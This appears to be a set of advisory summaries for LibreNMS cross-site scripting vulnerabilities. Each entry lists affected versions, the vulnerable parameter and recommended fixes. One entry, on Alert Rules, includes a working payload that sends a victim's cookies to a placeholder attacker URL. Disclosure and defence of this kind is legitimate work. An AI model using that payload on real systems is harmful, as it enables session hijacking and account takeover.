Raphaelcss

**Name of the Vulnerable Software and Affected Versions** LibreNMS versions prior to 24.10.0 **Description** A Stored Cross-Site Scripting (XSS) vulnerability in the "Services" tab of the Device page allows authenticated users to inject arbitrary JavaScript through the `descr` parameter when adding a service to a device. This could result in the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and enabling unauthorized actions. The vulnerability is exploited by injecting an XSS payload in the `descr` parameter, which is reflected in the "Services" tab of the device. The root cause is the application's failure to sanitize the `descr` parameter before outputting it in the HTML. **Recommendations** For versions prior to 24.10.0, update to version 24.10.0 to fix the vulnerability. As a temporary workaround, consider restricting access to the "Services" tab of the Device page or disabling the ability to add services to devices until the update is applied. Avoid using the `descr` parameter in the affected API endpoint until the issue is resolved.

Name of the Vulnerable Software and Affected Versions: LibreNMS versions prior to 24.10.0 Description: A Stored Cross-Site Scripting (XSS) vulnerability in the API-Access page allows authenticated users to inject arbitrary JavaScript through the `token` parameter when creating a new API token. This can result in the execution of malicious code in the context of other users' sessions, compromising their accounts and enabling unauthorized actions. Recommendations: For versions prior to 24.10.0, update to version 24.10.0 to fix the vulnerability. As a temporary workaround, consider restricting access to the API-Access page or disabling the creation of new API tokens until the update is applied. Avoid using the `token` parameter in the affected API endpoint until the issue is resolved.

Name of the Vulnerable Software and Affected Versions: LibreNMS versions prior to 24.10.0 Description: A Stored Cross-Site Scripting (XSS) vulnerability in the "Manage User Access" page allows authenticated users to inject arbitrary JavaScript through the `bill name` parameter when creating a new bill. This can lead to the execution of malicious code when visiting the "Bill Access" dropdown in the user's "Manage Access" page, potentially compromising user sessions and allowing unauthorized actions. Recommendations: For versions prior to 24.10.0, update to version 24.10.0 to fix the vulnerability. As a temporary workaround, consider restricting access to the "Manage User Access" page and the "Bill Access" dropdown to minimize the risk of exploitation. Avoid using the `bill name` parameter in the affected page until the issue is resolved.

Name of the Vulnerable Software and Affected Versions: LibreNMS versions prior to 24.10.0 Description: A Stored Cross-Site Scripting (XSS) vulnerability in the "Capture Debug Information" page allows authenticated users to inject arbitrary JavaScript through the `hostname` parameter when creating a new device. This results in the execution of malicious code when the "Capture Debug Information" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain. Recommendations: For versions prior to 24.10.0, update to version 24.10.0 to fix the vulnerability. As a temporary workaround, consider restricting access to the "Capture Debug Information" page to minimize the risk of exploitation. Avoid using the `hostname` parameter in the affected page until the issue is resolved.

Name of the Vulnerable Software and Affected Versions: LibreNMS versions prior to 24.10.0 Description: A Stored Cross-Site Scripting (XSS) vulnerability in the "Port Settings" page allows authenticated users to inject arbitrary JavaScript through the `name` parameter when creating a new Port Group. This results in the execution of malicious code when the "Port Settings" page is visited after the affected Port Group is added to a device, potentially compromising user sessions and allowing unauthorized actions. Recommendations: For versions prior to 24.10.0, update to version 24.10.0 to fix the vulnerability. As a temporary workaround, consider restricting access to the "Port Settings" page and avoiding the use of the `name` parameter when creating new Port Groups until the update is applied.

Name of the Vulnerable Software and Affected Versions: LibreNMS versions prior to 24.10.0 Description: A Reflected Cross-Site Scripting (XSS) vulnerability in the `section` parameter of the logs tab of a device allows attackers to inject arbitrary JavaScript. This vulnerability results in the execution of malicious code when a user accesses the page with a malicious `section` parameter, potentially compromising their session and enabling unauthorized actions. The issue arises from a lack of sanitization in the `report this()` function. The vulnerability allows attackers to execute arbitrary JavaScript in the context of a user’s session by crafting a malicious URL, which could lead to session hijacking, unauthorized actions, or further exploitation by injecting malicious scripts. Recommendations: For versions prior to 24.10.0, update to version 24.10.0 to fix the vulnerability. As a temporary workaround, consider restricting access to the logs tab or disabling the `report this()` function until a patch is available. Avoid using the `section` parameter in the affected API endpoint until the issue is resolved.

Name of the Vulnerable Software and Affected Versions: LibreNMS versions prior to 24.10.0 Description: A Stored Cross-Site Scripting (XSS) vulnerability in the "Services" section of the Device Overview page allows authenticated users to inject arbitrary JavaScript through the `name` parameter when adding a service to a device. This could result in the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and enabling unauthorized actions. Recommendations: For versions prior to 24.10.0, update to version 24.10.0 to fix the vulnerability. As a temporary workaround, consider restricting access to the "Services" section of the Device Overview page to minimize the risk of exploitation. Avoid using the `name` parameter in the affected API endpoint until the issue is resolved.

**Name of the Vulnerable Software and Affected Versions** LibreNMS versions prior to 24.10.0 **Description** A Stored Cross-Site Scripting (XSS) vulnerability in the "Port Settings" page allows authenticated users to inject arbitrary JavaScript through the `descr` parameter when editing a device's port settings. This can lead to the execution of malicious code when the "Port Settings" page is visited, potentially compromising the user's session and allowing unauthorized actions. **Recommendations** For versions prior to 24.10.0, update to version 24.10.0 or later to fix the vulnerability. As a temporary workaround, consider restricting access to the "Port Settings" page or disabling the editing of device port settings until the update is applied. Avoid using the `descr` parameter in the affected API endpoint until the issue is resolved.

**Name of the Vulnerable Software and Affected Versions** LibreNMS versions prior to 24.10.0 **Description** A Stored Cross-Site Scripting (XSS) vulnerability in the Device Overview page allows authenticated users to inject arbitrary JavaScript through the `overwrite ip` parameter when editing a device. This results in the execution of malicious code when the device overview page is visited, potentially compromising the accounts of other users. The vulnerability occurs when editing a device, and an attacker can inject arbitrary JavaScript into the `overwrite ip` parameter. The malicious script is then executed in the "Assigned IP" field when the device overview page is loaded. **Recommendations** For versions prior to 24.10.0, update to version 24.10.0 or later to fix the vulnerability. As a temporary workaround, consider restricting access to the Device Overview page or disabling the editing of devices to minimize the risk of exploitation. Avoid using the `overwrite ip` parameter in the affected API endpoint until the issue is resolved.

**Name of the Vulnerable Software and Affected Versions** LibreNMS versions prior to 24.10.0 **Description** A Reflected Cross-Site Scripting (XSS) vulnerability in the `metric` parameter of the "/wireless" and "/health" endpoints allows attackers to inject arbitrary JavaScript, potentially compromising a user's session and allowing unauthorized actions. This occurs due to improper sanitization of the `metric` parameter. Attackers can execute malicious code when a user accesses the page with a malicious `metric` parameter. **Recommendations** For versions prior to 24.10.0, update to version 24.10.0 or later to fix the vulnerability. As a temporary workaround, consider restricting access to the "/wireless" and "/health" endpoints to minimize the risk of exploitation. Avoid using the `metric` parameter in these endpoints until the issue is resolved.

**Name of the Vulnerable Software and Affected Versions** LibreNMS versions prior to 24.10.0 **Description** A Stored Cross-Site Scripting (XSS) vulnerability in the "Custom OID" tab of a device allows authenticated users to inject arbitrary JavaScript through the `unit` parameter when creating a new OID. This can lead to the execution of malicious code in the context of other users' sessions, compromising their accounts and enabling unauthorized actions. **Recommendations** For versions prior to 24.10.0, update to version 24.10.0 to fix the vulnerability. As a temporary workaround, consider restricting access to the "Custom OID" tab or disabling the ability to create new OIDs until the update can be applied. Avoid using the `unit` parameter in the affected API endpoint until the issue is resolved.

**Name of the Vulnerable Software and Affected Versions** LibreNMS versions prior to 24.9.0 **Description** A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Rules" feature allows authenticated users to inject arbitrary JavaScript through the "Title" field. This can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions. The vulnerability occurs when creating an alert rule, as the application does not properly sanitize user inputs in the "Title" field. For example, a payload like `test1'' autofocus onfocus="document.location='https://<attacker-url>/logger.php?c='+document.cookie"` can be used to trigger the XSS when the affected page is loaded, automatically redirecting the user to the attacker's controlled domain with any non-httponly cookies present. **Recommendations** For versions prior to 24.9.0, update to 24.9.0 or later to stay protected. As a temporary workaround, consider restricting access to the "Alert Rules" feature until the issue is resolved. Avoid using the `name` field in the "Alert Rules" feature to inject malicious JavaScript code. Restrict the use of the `title` field to minimize the risk of exploitation.

**Name of the Vulnerable Software and Affected Versions** LibreNMS versions prior to 24.9.0 **Description** A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Transports" feature allows authenticated users to inject arbitrary JavaScript through the "Details" section. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions. The application does not properly sanitize the user input in the "Details" field, allowing an attacker to inject and store arbitrary JavaScript. **Recommendations** For versions prior to 24.9.0, update to version 24.9.0 to fix the vulnerability. As a temporary workaround, consider restricting access to the "Alert Transports" feature to minimize the risk of exploitation. Avoid using the "Details" section in the "Alert Transports" feature until the issue is resolved.

**Name of the Vulnerable Software and Affected Versions** LibreNMS versions prior to 24.9.0 **Description** A Stored Cross-Site Scripting (XSS) vulnerability in the "Device Dependencies" feature allows authenticated users to inject arbitrary JavaScript through the `hostname` parameter. This can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions. The vulnerability occurs when creating a device within LibreNMS, and an attacker can inject arbitrary JavaScript into the `hostname` parameter. This malicious script is then executed when another user visits the device dependencies page. **Recommendations** For versions prior to 24.9.0, update to version 24.9.0 or later to fix the vulnerability. As a temporary workaround, consider restricting access to the "Device Dependencies" feature to minimize the risk of exploitation. Avoid using the `hostname` parameter in the affected API endpoint until the issue is resolved.

**Name of the Vulnerable Software and Affected Versions** LibreNMS (affected versions not specified) **Description** A Self Cross-Site Scripting (Self-XSS) vulnerability in the "Alert Templates" feature allows users to inject arbitrary JavaScript into the alert template's name. This script executes immediately upon submission but does not persist after a page refresh. The vulnerability occurs when creating an alert template in the LibreNMS interface, where the application sanitizes the "name" field when storing it in the database, but this newly created template is immediately added to the table without any sanitization being applied to the name. The root cause of this vulnerability lies in the lack of sanitization of the `name` variable before it is rendered in the table. **Recommendations** At the moment, there is no information about a newer version that contains a fix for this vulnerability.